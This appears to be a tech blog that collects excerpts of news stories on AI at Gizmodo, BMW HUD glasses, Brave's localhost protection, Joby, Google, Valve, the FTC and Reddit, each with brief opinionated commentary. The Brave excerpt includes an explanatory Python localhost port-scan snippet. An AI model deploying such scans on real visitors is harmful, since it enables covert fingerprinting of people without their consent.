The irony that the turmoil was happening at Gizmodo, a publication dedicated to covering technology, was undeniable… Merrill Brown, the editorial director of G/O Media, wrote that because G/O Media owns several sites that cover technology, it has a responsibility to “do all we can to develop AI initiatives relatively early in the evolution of the technology.” “These features aren’t replacing work currently being done by writers and editors,” Brown said in announcing to staffers that the company would roll out a trial to test “our editorial and technological thinking about use of AI.”

“There will be errors, and they’ll be corrected as swiftly as possible,” he promised… In a Slack message reviewed by The Post, Brown told disgruntled employees Thursday that the company is “eager to thoughtfully gather and act on feedback…” The note drew 16 thumbs down emoji, 11 wastebasket emoji, six clown emoji, two face palm emoji and two poop emoji, according to screenshots of the Slack conversation…

Earlier this week, Lea Goldman, the deputy editorial director at G/O Media, notified employees on Slack that the company had “commenced limited testing” of AI-generated stories on four of its sites, including A.V. Club, Deadspin, Gizmodo and The Takeout, according to messages The Post viewed… Employees quickly messaged back with concern and skepticism. “None of our job descriptions include editing or reviewing AI-produced content,” one employee said. “If you wanted an article on the order of the Star Wars movies you … could’ve just asked,” said another. “AI is a solution looking for a problem,” a worker said. “We have talented writers who know what we’re doing. So effectively all you’re doing is wasting everyone’s time.”
The Post spotted four AI-generated stories on the company’s sites, including io9, Deadspin, and its food site The Takeout.

Source: How An AI-Written ‘Star Wars’ Story Created Chaos at Gizmodo – Slashdot

If you look at Gizmodo’s reporting on AI, you see it’s full of doom and gloom – the writers there know what’s coming, and although they are smart enough to understand what AI is, they can’t fathom the opportunities it brings, unfortunately. The way this article is written gives a clue: a deputy editor didn’t read the published article beforehand (the entitlement shines through, but let’s be clear, this editor has no right to second-guess the actual editor), and then there’s the job descriptions quote (whoever had a complete job description? – and the description may have said simply “editing or reviewing” without the AI bit in there – and why should it have an AI bit in there at all?).

BMW’s Heads-Up Display Glasses Could Make You Feel Like a Motorcycle-Riding Cyborg

If you’ve ever been riding your motorcycle and thought it’d be cool to have a Terminator-like head-up display, giving you vehicle and navigation data, BMW has just the thing for you. They’re called the BMW ConnectedRide Smartglasses—smart sunglasses with a head-up display (HUD) built into the right lens.

For a smart pair of glasses with a HUD built in, they aren’t too clunky looking. They’re obviously a bit thicker than a normal pair of glasses, but they look pretty sleek, all things considered. They don’t have a camera built in like Google Glass did, so they only need to house a small lithium-ion battery pack and a tiny HUD projector.

The display is pretty small but it’s surprisingly comprehensive. It shows outside temperature, speed, speed limit, gear, and turn-by-turn navigation. With the latter, users can choose either a simplified arrow or a detailed navigation screen with street names and exact directions. According to BMW, a full battery charge will last ten hours, which is more than enough for a day’s worth of riding.

BMW says these glasses can be made to fit a variety of head and helmet shapes, which is said to make them comfortable enough to wear for a full day. The pair also comes with two different lenses: one is 85 percent transparent and designed to be used with helmets that have tinted sun visors, while the other is tinted, turning the glasses into sunglasses. Prescription lenses can be fitted by an optician via an RX adapter.

[…]

Source: BMW’s Heads-Up Display Glasses Could Make You Feel Like a Motorcycle-Riding Cyborg

Brave to stop websites from port scanning visitors – wait that hasn’t been done by everyone yet?!

The Brave browser will take action against websites that snoop on visitors by scanning their open Internet ports or accessing other network resources that can expose personal information.

Starting in version 1.54, Brave will automatically block website port scanning, a practice that a surprisingly large number of sites were found engaging in a few years ago. According to this list compiled in 2021 by a researcher who goes by the handle G666g1e, 744 websites scanned visitors’ ports, most or all without providing notice or seeking permission in advance. eBay, Chick-fil-A, Best Buy, Kroger, and Macy’s were among the offending websites.

Some sites use similar tactics in an attempt to fingerprint visitors so they can be re-identified each time they return, even if they delete browser cookies. By running scripts that access local resources on the visiting devices, the sites can detect unique patterns in a visiting browser. Sometimes there are benign reasons a site will access local resources, such as detecting insecurities or allowing developers to test their websites. Often, however, there are more abusive or malicious motives involved.

The new version of Brave will curb the practice. By default, no website will be able to access local resources. More advanced users who want a particular site to have such access can add it to an allow list.

[…]

Brave will continue to use filter list rules to block scripts and sites known to abuse localhost resources. Additionally, the browser will include an allow list that gives the green light to sites known to access localhost resources for user-benefiting reasons.

“Brave has chosen to implement the localhost permission in this multistep way for several reasons,” developers of the browser wrote. “Most importantly, we expect that abuse of localhost resources is far more common than user-benefiting cases, and we want to avoid presenting users with permission dialogs for requests we expect will only cause harm.”

The scanning of ports and other activities that access local resources is typically done using JavaScript that’s hosted on the website and runs inside a visitor’s browser. A core web security principle known as the same origin policy bars JavaScript hosted by one Internet domain from accessing the data or resources of a different domain. This prevents malicious Site A from being able to obtain credentials or other personal data associated with Site B.

The same origin policy, however, doesn’t prevent websites from interacting in some ways with a visitor’s localhost IP address of 127.0.0.1.
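
In-page scripts do this with JavaScript – typically by timing fetch or WebSocket attempts against 127.0.0.1 – but the underlying probe is an ordinary TCP connect scan, sketched here in Python for concreteness:

```python
# The underlying probe behind in-browser "port scanning" is an ordinary
# TCP connect scan, shown here in Python for concreteness. In-page scripts
# do the equivalent by timing fetch/WebSocket attempts against 127.0.0.1.
# The port list is an arbitrary example of what fingerprinting scripts
# look for.
import socket

PORTS_OF_INTEREST = [3389, 5900, 6463, 8080]  # e.g. RDP, VNC, Discord RPC, dev servers

def scan_localhost(ports: list[int], timeout: float = 0.25) -> dict[int, bool]:
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when something is listening on the port
            results[port] = s.connect_ex(("127.0.0.1", port)) == 0
    return results

open_ports = [p for p, is_open in scan_localhost(PORTS_OF_INTEREST).items() if is_open]
print("open localhost ports:", open_ports)  # a fingerprintable signal
```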

[…]

“As far as we can tell, Brave is the only browser that will block requests to localhost resources from both secure and insecure public sites, while still maintaining a compatibility path for sites that users trust (in the form of the discussed localhost permission),” the Brave post said.

[…]

Source: Brave aims to curb practice of websites that port scan visitors | Ars Technica

This should not be a possibility!

Joby Aviation gets first passenger electric VTOL testing certification from FAA

Joby Aviation, Inc. (NYSE:JOBY), a company developing all-electric aircraft for commercial passenger service, today announced it has received a Special Airworthiness Certificate for the first aircraft built at its Pilot Production Line in Marina, California. Issued by the Federal Aviation Administration, the certificate allows Joby to begin flight testing of its first production prototype.

The aircraft is expected to become the first ever eVTOL aircraft to be delivered to a customer when it moves to Edwards Air Force Base in 2024 to be operated by Joby as part of the Company’s Agility Prime contract with the U.S. Air Force, worth up to $131 million.

[…]

Joby has been flying full-size aircraft since 2017 and its pre-production prototype aircraft have flown more than 30,000 miles since 2019. Today’s production prototype builds on that experience and marks another important step toward achieving FAA certification and production at scale.

[…]

Joby plans to begin commercial passenger operations in 2025 and recently partnered with Delta Air Lines to deliver seamless, emissions-free travel for Delta customers traveling to and from airports.

[…]

The aircraft will now undergo initial flight testing before being delivered to Edwards Air Force Base, California, where it will be used to demonstrate a range of potential logistics use cases.

Source: Joby Marks Production Launch, Receives Permit to Fly First Aircraft Built on Production Line | Joby

Google Says It’ll Scrape Everything You Post Online for AI

Google updated its privacy policy over the weekend, explicitly saying the company reserves the right to scrape just about everything you post online to build its AI tools. If Google can read your words, assume they belong to the company now, and expect that they’re nesting somewhere in the bowels of a chatbot.

“Google uses information to improve our services and to develop new products, features and technologies that benefit our users and the public,” the new Google policy says. “For example, we use publicly available information to help train Google’s AI models and build products and features like Google Translate, Bard, and Cloud AI capabilities.”

Fortunately for history fans, Google maintains a history of changes to its terms of service. The new language amends an existing policy, spelling out the new ways your online musings might be put to work in the tech giant’s AI tools.

[…]

This is an unusual clause for a privacy policy. Typically, these policies describe ways that a business uses the information that you post on the company’s own services. Here, it seems Google reserves the right to harvest and harness data posted on any part of the public web, as if the whole internet is the company’s own AI playground. Google did not immediately respond to a request for comment.

[…]

Source: Google Says It’ll Scrape Everything You Post Online for AI

The rest of the article descends into Gizmodo’s luddite War Against AI™ language, unfortunately, because it misses the point that this is basically nothing new – Google has been able to use any information you type into any of its products for pretty much any purpose (e.g. advertising, email scanning, etc.) for decades (which is why I don’t use Chrome). However, it is something that most people simply don’t realise.

Valve All But Bans AI-Generated Content from Steam Games

Game developers looking to distribute their playable creations via Valve’s popular Steam hub may have trouble if they’re looking to use AI during the creative process. The game publisher and distributor says that Steam will no longer tolerate products that were generated using copyright-infringing AI content. Since that’s a policy that could apply to most—if not all—of AI-generated content, it’s hard not to see this move as an outright AI ban by the platform.

Valve’s policy was initially spotted by a Redditor who claimed that the platform had rejected a game they submitted over copyright concerns. “I tried to release a game about a month ago, with a few assets that were fairly obviously AI generated,” said the dev, revealing that they’d been met with an email stating that Valve could not ship their game unless they could “affirmatively confirm that you own the rights to all of the IP used in the data set that trained the AI to create the assets in your game.” Because the developer could not affirmatively prove this, their game was ultimately rejected.

When reached for comment by Gizmodo, Valve spokesperson Kaci Boyle clarified that the company was not trying to discourage the use of AI outright but that usage needed to comply with existing copyright law.

“The introduction of AI can sometimes make it harder to show that a developer has sufficient rights in using AI to create assets, including images, text, and music,” Boyle explained to Gizmodo. “In particular, there is some legal uncertainty relating to data used to train AI models. It is the developer’s responsibility to make sure they have the appropriate rights to ship their game.”

[…]

Valve’s decision to nix any game that uses problematic AI content is obviously a defensive posture designed to protect against any unforeseen legal developments in the murky regulatory terrain that is the blossoming AI industry.

[…]

A legal fight is brewing over the role of copyrighted materials in the AI industry. Large language models—the high-tech algorithms that animate popular AI products like ChatGPT and DALL-E—have been trained with massive amounts of data from the web. As it turns out, a lot of that data is copyrighted material—stuff like works of art, books, essays, photographs, and videos. Multiple lawsuits have argued that AI companies like OpenAI and Midjourney are basically stealing and repackaging millions of people’s copyrighted works and then selling a product based on those works; those companies, in turn, have defended themselves, claiming that training an AI generator to spit out new text or imagery based on ingested data is the same thing as a human writing a novel after having been inspired by other books. Not everybody is buying this claim, leading to the growing refrain “AI is theft.”

Source: Valve All But Bans AI-Generated Content from Steam Games

So the problem really is that the law is not clear, and Valve has decided to pre-empt it by adopting a punitive vision of copyright law in advance. That’s not so strange considering the stranglehold copyright law has in the West, which goes to show yet again: copyright law – allowing people to coast on past work forever – is stifling innovation.

Big Business Isn’t Happy With FTC’s ‘Click to Cancel’ Proposal – says people enjoy tortuous cancellations

The Federal Trade Commission’s recent proposal to require that companies offer customers easy one-click options to cancel subscriptions might seem like a no-brainer, something unequivocally good for consumers. Not according to the companies it would affect, though. In their view, the introduction of simple unsubscribe buttons could lead to a wave of accidental cancellations by dumb customers. Best, they say, to let big businesses protect customers from themselves and make it a torment to stop your service.

Those were some of the points shared by groups representing major publishers and advertisers during the FTC’s public comment period, which ended in June. Consumers, according to the Wall Street Journal, generally appeared eager for the new proposals, which supporters say could make a dent in the tricky, bordering-on-deceptive anti-cancellation tactics deployed by cable companies, entertainment sites, gyms, and other businesses that game out ways to make it as difficult as possible to quickly quit a subscription.

[…]

Source: Big Business Isn’t Happy With FTC’s ‘Click to Cancel’ Proposal

Film companies demand names of Reddit users who discussed piracy in 2011

Reddit is fighting another attempt by film companies to unmask anonymous Reddit users who discussed piracy.

The same companies lost a previous, similar motion to identify Reddit users who wrote comments in piracy-related threads. Reddit avoided revealing the identities of eight users by arguing that the First Amendment protected their right to anonymous speech.

Reddit is seeking a similar outcome in the new case, in which the film companies’ subpoena to Reddit sought “Basic account information including IP address registration and logs from 1/1/2016 to present, name, email address and other account registration information” for six users who wrote comments on Reddit threads in 2011 and 2018.

[…]

Film companies, including Bodyguard Productions and Millennium, are behind both lawsuits. In the first case, they sued Internet provider RCN for allegedly ignoring piracy on its broadband network. They sued Grande in the second case. Both RCN and Grande are owned by Astound Broadband.

Reddit is a non-party in both copyright infringement cases filed against the Astound-owned ISPs, but was served with subpoenas demanding information on Reddit users. When Reddit refused to provide all the requested information in both cases, the film companies filed motions to compel Reddit to respond to the subpoenas in US District Court for the Northern District of California.

[…]

Reddit’s response to the latest motion to compel, first reported by TorrentFreak, said the film companies “have already obtained from Grande identifying information for 118 of Grande’s ‘top 125 pirating IP addresses.’ That concession dooms the Motion; Plaintiffs cannot possibly establish that unmasking these six Reddit users is the only way for Plaintiffs to generate evidence necessary for their claims when they have already succeeded in pursuing an alternative and better way.”

The evidence obtained directly from Grande is “far better than what they could obtain from Reddit,” Reddit said, adding that plaintiffs can subpoena the 118 subscribers that are known to have engaged in copyright infringement instead.

Reddit said the six users whose identities are being sought “posted generally about using Grande to torrent. These six Reddit users responded to two threads in a subreddit for the city of Austin, Texas. The majority of the users posted over 12 years ago while the remaining two posted five years ago.”
[…]

Source: Film companies demand names of Reddit users who discussed piracy in 2011 | Ars Technica